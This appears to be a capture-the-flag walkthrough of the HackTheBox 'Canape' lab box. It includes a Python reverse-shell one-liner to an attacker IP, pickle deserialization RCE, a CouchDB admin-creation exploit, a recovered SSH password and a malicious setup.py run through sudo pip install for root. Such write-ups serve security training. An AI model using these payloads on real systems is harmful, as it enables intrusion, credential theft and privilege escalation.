Hi All, today we are going to solve canape machine from hackthebox..this walkthrough would be a fast run! as i am still in hangover of clearing OSCP ( :D) and a bit busy this weekend..so i shall skip few commands and give you brief explanation how i solved this box.
So Lets start with nmap scan : nmap 10.10.10.70
PORT STATE SERVICE
80/tcp open http
we see only one port open…after a bit of enumeration from dirbusting the directories and other stuff, we find two interesting things :
- git repository is exposed : http://10.10.10.70/.git/
- we see a submit quotes page which lets us to submit quotes.
and a comment in the source code of page. which specifies another interesting page : http://10.10.10.70/check
from the git repository we download all the files recursively and clone it to a local repo.
root@kali:~/git# ls
__init__.py static templates
we find few interesting things in the python code.
first one being the poor input sanitization of “character” field . and the character and submitted quote is written directly to a file as the md5 of both.
as this line : p_id = md5(char + quote).hexdigest()
<<snipped>>
WHITELIST = [
“homer”,
“marge”,
“bart”,
“lisa”,
“maggie”,
“moe”,
“carl”,
“krusty”
]
if request.method == “POST”:
try:
char = request.form[“character”]
quote = request.form[“quote”]
if not char or not quote:
error = True
elif not any(c.lower() in char.lower() for c in WHITELIST):
error = True
else:
# TODO – Pickle into dictionary instead, `check` is ready
p_id = md5(char + quote).hexdigest()
outfile = open(“/tmp/” + p_id + “.p”, “wb”)
outfile.write(char + quote)
outfile.close()
success = True
except Exception as ex:
error = True
return render_template(“submit.html”, error=error, success=success)
<<snipped>>
and the next one being, in the check page code , we can see it is using pickle to deserialize the stored object from the file…From a recent vuln it was found that the way pickle handles data leads to RCE.
More on this vulnerability explained :
https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
so our strategy is to create a payload inside character field and exploit the vuln by calling the check with our malicious md5 hashed file .(too lazy to share exploit π write it yourself , this is fast run!Β i shall share the git link :P)
character = reverse shell payload + “Homer”
once request is posted for quotes, we access the check page with our already known calculated md5 hash id named file. I used a python reverse shell payload from pentest monkey.
python -c “import os; import pty; import socket; lhost = ‘10.10.14.14’; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(‘HISTFILE’, ‘/dev/null’); pty.spawn(‘/bin/bash’); s.close();”
this is then used as shown in exploit , a class object under reduce function ,converted into pickle format using cpickle.dumps ( will find it in script) and post the request to quotes.
Then we post request to check with MD5 hashed filename.
We get a quick reverse shell ! π
root@kali:~# nc -nlvp 443
listening on [any] 443 …
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.70] 58594
www-data@canape:/$
but we are still , a low priv www user who does not have access to the actual user flag .
so lets enum more :
from /etc/passwd :
we find a valid user :
homer:x:1000:1000:homer,,,:/home/homer:/bin/bash
now enumerating more we find that it is running couch db for its backend database . and also few interesting things from the /var/www folder.
we can confirm couch db is running :
www-data@canape:/var/www/git$ curl -s http://localhost:5984
curl -s http://localhost:5984
{“couchdb”:”Welcome”,”version”:”2.0.0″,”vendor”:{“name”:”The Apache Software Foundation”}}
this version is found to be vulnerable to admin user priv escalation .
https://www.exploit-db.com/exploits/44498/
now we can exploit it like this :
www-data@canape:/var/www/git$ python 44498.py localhost -p 5984 -u menoe -P menoe
<t$ python 44498.py localhost -p 5984 -u menoe -P menoe
[+] User to create: menoe
[+] Password: menoe
[+] Attacking host localhost on port 5984
[+] User menoe with password menoe successfully created.
Now lets use the user to fetch juicy database details..(* after a long lookup at couch db docs ! *) .after few mins of enumeration , it was found that password was stored in following view :
www-data@canape:/var/www/git$ curl -s http://menoe:menoe@localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
<noe@localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
{“_id”:”739c5ebdf3f7a001bebb8fc4380019e4″,”_rev”:”2-81cf17b971d9229c54be92eeee723296″,”item”:”ssh”,”password”:”0B4jyA0xtytZi7esBNGp“,”user”:””}
www-data@canape:/var/www/git$ su homer
Password: 0B4jyA0xtytZi7esBNGp
homer@canape:/var/www/git$ whoami
homer
and now ! we can grab the user.txt flag! Now lets move onto privilege escalation .
now, from quick enumeration , we find that homer can execute few commands as root :
homer@canape:/var/www/git$ sudo -l
User homer may run the following commands on canape:
(root) /usr/bin/pip install *
A classic priv esc scenario ! wild card entry for pip install! lets create a temporary folder and add setup.py inside it .with priv escΒ π here we have created a folder called privesc, inside it we have added a setup.py file which contains following code to steal root flag.(we can replace any priv code to execute)
homer@canape:/tmp/privesc$ cat setup.py
import os
os.system(“cat /root/root.txt > /tmp/root.txt”)
os.system(“chmod 777 /tmp/root.txt”)
we can leverage pip -e option to install from a local built package. finally run this command to get root flag!
homer@canape:/tmp/privesc$ sudo /usr/bin/pip install -e /tmp/privesc/
command exits with no files/directories error, but our code should have been run already!lets verify :
homer@canape:/tmp$ ls -l /tmp/root.txt
–rwxrwxrwx 1 root root 33 Sep 15 10:53 /tmp/root.txt
thats awesome! now lets quickly get our root flag π
homer@canape:/tmp$ cat /tmp/root.txt
<<root flag contents >>
thats all for this fast run! thank you. stay tuned for next writeup . have a nice day!